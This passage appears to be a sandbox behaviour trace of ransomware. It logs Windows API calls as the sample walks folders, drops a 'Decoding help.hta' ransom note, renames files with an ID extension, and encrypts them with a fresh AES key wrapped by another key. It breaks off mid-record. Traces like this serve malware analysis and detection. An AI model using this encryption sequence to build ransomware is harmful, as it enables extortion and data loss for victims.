lpString2="{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017" [0040.588] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\*.*" [0040.588] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110cb940, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.589] CloseHandle (hObject=0x18c) returned 1 [0040.589] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa912d270, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e52a6842-b0ac-476e-b48f-378a97a67346}", cAlternateFileName="{E52A6~1")) returned 1 [0040.589] lstrcmpW (lpString1=".", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned -1 [0040.589] lstrcmpW (lpString1="..", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned -1 [0040.589] lstrcmpiW (lpString1="windows", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}") returned 1 [0040.591] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.591] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.591] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{e52a6842-b0ac-476e-b48f-378a97a67346}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}" [0040.591] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*.*" [0040.591] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.591] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110e39a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.592] CloseHandle (hObject=0x18c) returned 1 [0040.592] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca64c20, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcad7040, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcad7040, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{e6e75766-da0f-4ba2-9788-6ea593ce702d}", cAlternateFileName="{E6E75~1")) returned 1 [0040.592] lstrcmpW (lpString1=".", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned -1 [0040.592] lstrcmpW (lpString1="..", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned -1 [0040.592] lstrcmpiW (lpString1="windows", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned 1 [0040.594] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.594] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.594] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{e6e75766-da0f-4ba2-9788-6ea593ce702d}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}" [0040.594] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\*.*" [0040.594] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x110fba10, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.595] CloseHandle (hObject=0x18c) returned 1 [0040.595] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf93c9960, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf93efac0, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf93efac0, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{f325f05b-f963-4640-a43b-c8a494cdda0f}", cAlternateFileName="{F325F~1")) returned 1 [0040.595] lstrcmpW (lpString1=".", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned -1 [0040.595] lstrcmpW (lpString1="..", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned -1 [0040.595] lstrcmpiW (lpString1="windows", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned 1 [0040.597] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.597] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.597] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{f325f05b-f963-4640-a43b-c8a494cdda0f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}" [0040.597] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\*.*" [0040.597] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11113a78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.602] CloseHandle (hObject=0x18c) returned 1 [0040.602] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 1 [0040.602] lstrcmpW (lpString1=".", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned -1 [0040.602] lstrcmpW (lpString1="..", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned -1 [0040.602] lstrcmpiW (lpString1="windows", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned 1 [0040.604] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\*.*" [0040.604] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\*.*") returned 36 [0040.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\", lpString2="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005" [0040.604] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*" [0040.604] GlobalMemoryStatus (in: lpBuffer=0x764fd10 | out: lpBuffer=0x764fd10) [0040.604] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1112bae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x18c [0040.605] CloseHandle (hObject=0x18c) returned 1 [0040.605] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x764fd30 | out: lpFindFileData=0x764fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcbbb880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", cAlternateFileName="{F8CFE~1.210")) returned 0 [0041.495] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 72 os_tid = 0xb54 [0039.766] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*", lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb08409c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb08409c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5570 [0039.778] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.778] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf770e60, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb08409c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb08409c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.778] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.778] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.778] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf8093e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8093e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x2d22cc80, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1d270, dwReserved0=0x0, dwReserved1=0x0, cFileName="maintenanceservice.exe", cAlternateFileName="MAINTE~1.EXE")) returned 1 [0039.778] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0039.778] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0039.778] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" [0039.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\decoding help.hta")) returned 0xffffffff [0039.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0039.779] WriteFile (in: hFile=0x218, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x778fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.779] CloseHandle (hObject=0x218) returned 1 [0039.780] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.780] lstrcmpiW (lpString1="Decoding help.hta", lpString2="maintenanceservice.exe") returned -1 [0039.780] lstrlenW (lpString="maintenanceservice.exe") returned 22 [0039.780] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0039.780] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0039.780] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="maintenanceservice.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" [0039.780] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" [0039.780] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.780] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.816] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\maintenanceservice.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e0 [0039.816] CreateFileMappingA (hFile=0x1e0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x184 [0039.816] CryptAcquireContextA (in: phProv=0x778fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x778fcec*=0x5b02a8) returned 1 [0039.817] CryptGenKey (in: hProv=0x5b02a8, Algid=0x6610, dwFlags=0x1, phKey=0x778fce8 | out: phKey=0x778fce8*=0x5a56f0) returned 1 [0039.817] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x778fbe4, pdwDataLen=0x778fce4 | out: pbData=0x778fbe4*, pdwDataLen=0x778fce4*=0x2c) returned 1 [0039.818] MapViewOfFile (hFileMappingObject=0x184, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d260) returned 0x550000 [0039.828] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x100) returned 1 [0039.950] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x778fce4*=0x1d260, dwBufLen=0x1d260 | out: pbData=0x550000*, pdwDataLen=0x778fce4*=0x1d260) returned 1 [0039.977] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0039.979] CloseHandle (hObject=0x184) returned 1 [0039.979] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0039.979] CryptReleaseContext (hProv=0x5b02a8, dwFlags=0x0) returned 1 [0039.979] SetFilePointerEx (in: hFile=0x1e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.979] WriteFile (in: hFile=0x1e0, lpBuffer=0x778fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x778fbe4*, lpNumberOfBytesWritten=0x778fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.980] WriteFile (in: hFile=0x1e0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x778fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.980] CloseHandle (hObject=0x1e0) returned 1 [0039.982] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.982] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb08409c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb08409c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb08409c0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x19ee4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall.exe", cAlternateFileName="UNINST~1.EXE")) returned 1 [0039.982] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0039.982] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0039.982] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" [0039.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Decoding help.hta" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\decoding help.hta")) returned 0x1 [0039.982] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Uninstall.exe") returned -1 [0039.982] lstrlenW (lpString="Uninstall.exe") returned 13 [0039.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*" [0039.982] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\*.*") returned 58 [0039.983] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\", lpString2="Uninstall.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" [0039.983] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" [0039.983] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0039.987] CreateFileMappingA (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1e0 [0039.987] CryptAcquireContextA (in: phProv=0x778fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x778fcec*=0x5dc830) returned 1 [0039.988] CryptGenKey (in: hProv=0x5dc830, Algid=0x6610, dwFlags=0x1, phKey=0x778fce8 | out: phKey=0x778fce8*=0x5a57b0) returned 1 [0039.988] CryptExportKey (in: hKey=0x5a57b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x778fbe4, pdwDataLen=0x778fce4 | out: pbData=0x778fbe4*, pdwDataLen=0x778fce4*=0x2c) returned 1 [0039.988] MapViewOfFile (hFileMappingObject=0x1e0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x19ee0) returned 0x550000 [0039.997] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x778fbe4*, pdwDataLen=0x778fcf8*=0x100) returned 1 [0039.998] CryptEncrypt (in: hKey=0x5a57b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x550000, pdwDataLen=0x778fce4*=0x19ee0, dwBufLen=0x19ee0 | out: pbData=0x550000*, pdwDataLen=0x778fce4*=0x19ee0) returned 1 [0040.016] UnmapViewOfFile (lpBaseAddress=0x550000) returned 1 [0040.018] CloseHandle (hObject=0x1e0) returned 1 [0040.018] CryptDestroyKey (hKey=0x5a57b0) returned 1 [0040.018] CryptReleaseContext (hProv=0x5dc830, dwFlags=0x0) returned 1 [0040.018] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.018] WriteFile (in: hFile=0x228, lpBuffer=0x778fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x778fbe4*, lpNumberOfBytesWritten=0x778fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.019] WriteFile (in: hFile=0x228, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x778fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x778fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.019] CloseHandle (hObject=0x228) returned 1 [0040.020] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.020] FindNextFileW (in: hFindFile=0x5a5570, lpFindFileData=0x778fd30 | out: lpFindFileData=0x778fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf82f540, ftCreationTime.dwHighDateTime=0x1d2dda4, 